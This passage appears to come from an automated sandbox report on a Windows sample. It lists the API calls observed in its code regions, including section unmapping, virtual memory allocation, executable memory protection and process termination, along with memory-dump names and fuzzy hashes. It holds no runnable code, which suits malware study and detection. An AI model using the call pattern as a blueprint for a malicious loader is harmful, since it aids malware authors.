                                                                                Similarity
                                                                                • API ID: CloseFreeMemorySectionUnmapViewVirtual
                                                                                • String ID:
                                                                                • API String ID: 3320349860-0
                                                                                • Opcode ID: 188f8b6f1d376f19d687f11c21be0d03f228e20fd9304d7282a8211628cc8c36
                                                                                • Instruction ID: 604968aa50fe317101ff1d4887b3d7cd1a75c106297ca65db997c9debd794807
                                                                                • Opcode Fuzzy Hash: 188f8b6f1d376f19d687f11c21be0d03f228e20fd9304d7282a8211628cc8c36
                                                                                • Instruction Fuzzy Hash: FA310671900218EBEF24CB94CC4DBEEB375BB49315F64828AA11DA62D0CBB85EC4CF15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtClose.NTDLL(00000000), ref: 0043562C
                                                                                • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00435695
                                                                                • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 004356A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CloseFreeMemorySectionUnmapViewVirtual
                                                                                • String ID:
                                                                                • API String ID: 3320349860-0
                                                                                • Opcode ID: af932d642f6ad79af75f5b463a93244e82566cd67f8d0da9e2d64c393f9b7829
                                                                                • Instruction ID: 51c76f1343f0ec26a5da15dda2908f9517741de44a291e8043d947b8f342a8a4
                                                                                • Opcode Fuzzy Hash: af932d642f6ad79af75f5b463a93244e82566cd67f8d0da9e2d64c393f9b7829
                                                                                • Instruction Fuzzy Hash: 1E216670900618EBEF24CB90CC4DBEEB375BB08311FA0928AE119662C0CBB84EC4CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: cd402a352ddc17dd51bfb3b8dffc53a547eeeeb8e77fedd15555b077d7eeb747
                                                                                • Instruction ID: 6238b8ccb3f42f940ba4e24c1ae626af61c76d370d47b750129fee9020dd4ff5
                                                                                • Opcode Fuzzy Hash: cd402a352ddc17dd51bfb3b8dffc53a547eeeeb8e77fedd15555b077d7eeb747
                                                                                • Instruction Fuzzy Hash: EC411170A04209EFEF10CF94C848BEEBBB5BF98354F109159F9157B280C7B9AA85CB55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtTerminateProcess.NTDLL(000000FF,00000000), ref: 0043832D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ProcessTerminate
                                                                                • String ID:
                                                                                • API String ID: 560597551-0
                                                                                • Opcode ID: 5e74648f8415b3abc1f55e738af89c7949e93b21fbc3e0da6157c83b2565cb6c
                                                                                • Instruction ID: 80513499a7ed397fe39db85238073f76c907f169e60168fa2041f439afa6219b
                                                                                • Opcode Fuzzy Hash: 5e74648f8415b3abc1f55e738af89c7949e93b21fbc3e0da6157c83b2565cb6c
                                                                                • Instruction Fuzzy Hash: AB4150F2C00308AADF10DBE5CC45BEFB7786B1C305F04555FF505A6281EA399648CB6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00007FFF,00003000,00000004), ref: 004340C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: 484c9e5f2c93bf47596e3c6f4954b22454ae253e1a64b48f16b01ea7e63a0146
                                                                                • Instruction ID: c6f8b0846bc1e1c635515480c89d8d23f110a427215ea1c9d94e94278b875000
                                                                                • Opcode Fuzzy Hash: 484c9e5f2c93bf47596e3c6f4954b22454ae253e1a64b48f16b01ea7e63a0146
                                                                                • Instruction Fuzzy Hash: 6D415974A14608EBDB04DFA4C880BDEB3B6EF58300F109169E119EB390E779AE45CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00024E64), ref: 00424EAF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 45cbfcb17a86cfbcb73e49fedf9306be7215eada607a00ae90d99109fb0abd0f
                                                                                • Instruction ID: e94ade083b1b830b99426830c97f28827ac6bcc198d0918bbfe04d4f608174cc
                                                                                • Opcode Fuzzy Hash: 45cbfcb17a86cfbcb73e49fedf9306be7215eada607a00ae90d99109fb0abd0f
                                                                                • Instruction Fuzzy Hash: DCA002B8A853128FB74C6F61FD8A5047AB0FAC5713F615076F941812ACEF7415809A1D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • VirtualProtect.KERNELBASE(00433638,00008000,00000040,?), ref: 00412798
                                                                                • glCopyPixels.OPENGL32(00000020,0000003F,00000037,00000059,00001800), ref: 004127CA
                                                                                • glFlush.OPENGL32 ref: 004127D0
                                                                                • glDisableClientState.OPENGL32(00008075), ref: 004127DB
                                                                                • glCullFace.OPENGL32(00000404), ref: 004127E6
                                                                                • glClear.OPENGL32(00004000), ref: 004127F1
                                                                                • GrayStringA.USER32(00000000,00000001,00438158,00000001,00000001,00000001,00000001,00000001,00000001), ref: 00412813
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ClearClientCopyCullDisableFaceFlushGrayPixelsProtectStateStringVirtual
                                                                                • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                                                                                • API String ID: 207726862-3448699068
                                                                                • Opcode ID: 061ec756dfa1b11fdc7e196d4368c361a6216114ddafc95f6a3fd9683155030a
                                                                                • Instruction ID: 60c091a216035b857e658e3cb5e84d720e9581c9c2b230ee83090a1a4fba29e5
                                                                                • Opcode Fuzzy Hash: 061ec756dfa1b11fdc7e196d4368c361a6216114ddafc95f6a3fd9683155030a
                                                                                • Instruction Fuzzy Hash: BC745B1090CBEAC8DB32827C5C587CDAE611B23325F4843D9D1ED2A6D2C7B50B96DF66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0044DC60,0044D8DC,00000000,?,0044DC44,0044DC44,00431970,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4,?,00000000), ref: 004315E4
                                                                                • GlobalAlloc.KERNELBASE(00002002,00000000,?,?,0044DC44,0044DC44,00431970,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4,?,00000000), ref: 00431639
                                                                                • GlobalHandle.KERNEL32(005CFE28), ref: 00431642
                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,0044DC44,0044DC44,00431970,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4,?,00000000), ref: 0043164B
                                                                                • GlobalReAlloc.KERNEL32 ref: 0043165D
                                                                                • GlobalHandle.KERNEL32(005CFE28), ref: 00431674
                                                                                • GlobalLock.KERNEL32 ref: 0043167B
                                                                                • LeaveCriticalSection.KERNEL32(/-B,?,?,0044DC44,0044DC44,00431970,?,00000000,004311A7,00430872,004311C3,0042E17A,0042F3B4,?,00000000), ref: 00431681
                                                                                • GlobalLock.KERNEL32 ref: 00431690
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 004316D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                • String ID: /-B
                                                                                • API String ID: 2667261700-1957208732
                                                                                • Opcode ID: 75d6049ef1722b00d7d67ef8744e8ad9e10414afc54e1224bd4f72fc8bf4d8ef
                                                                                • Instruction ID: 13cf7a519cd5aca61aa5c257d3bd871a532735ad1248091cfabb8f5dddfff3d7
                                                                                • Opcode Fuzzy Hash: 75d6049ef1722b00d7d67ef8744e8ad9e10414afc54e1224bd4f72fc8bf4d8ef
                                                                                • Instruction Fuzzy Hash: C73170712007059FDB249F69DC8AA2AB7F9FB48306F045A2EF852C3761EB75E9448B14
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL ref: 0042F1CE
                                                                                • GetSystemMetrics.USER32 ref: 0042F1D5
                                                                                • GetDC.USER32(00000000), ref: 0042F1EE
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0042F1FF
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042F207
                                                                                • ReleaseDC.USER32 ref: 0042F20F
                                                                                  • Part of subcall function 00431B7C: GetSystemMetrics.USER32 ref: 00431B8E
                                                                                  • Part of subcall function 00431B7C: GetSystemMetrics.USER32 ref: 00431B98
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.279457763.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.279341258.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279636345.0000000000433000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279656850.000000000043B000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279663606.000000000043C000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279688703.0000000000445000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279700554.000000000044B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279704091.000000000044D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.279723938.0000000000450000.00000008.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                • String ID:
                                                                                • API String ID: 1031845853-0
                                                                                • Opcode ID: 678bd072c1f013ef6e71bf9dc481480001978fbdbca4103f4cef1d69009085f6
                                                                                • Instruction ID: b60dff0436095a2a3cd35e42cd7bad609ce9c33c1d2681f152af3d0c260ce89e
                                                                                • Opcode Fuzzy Hash: 678bd072c1f013ef6e71bf9dc481480001978fbdbca4103f4cef1d69009085f6
                                                                                • Instruction Fuzzy Hash: 63F03034A40700AEF2206F62DC49F27B7B4EF85756F10843FEA0196290DA789905CE69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
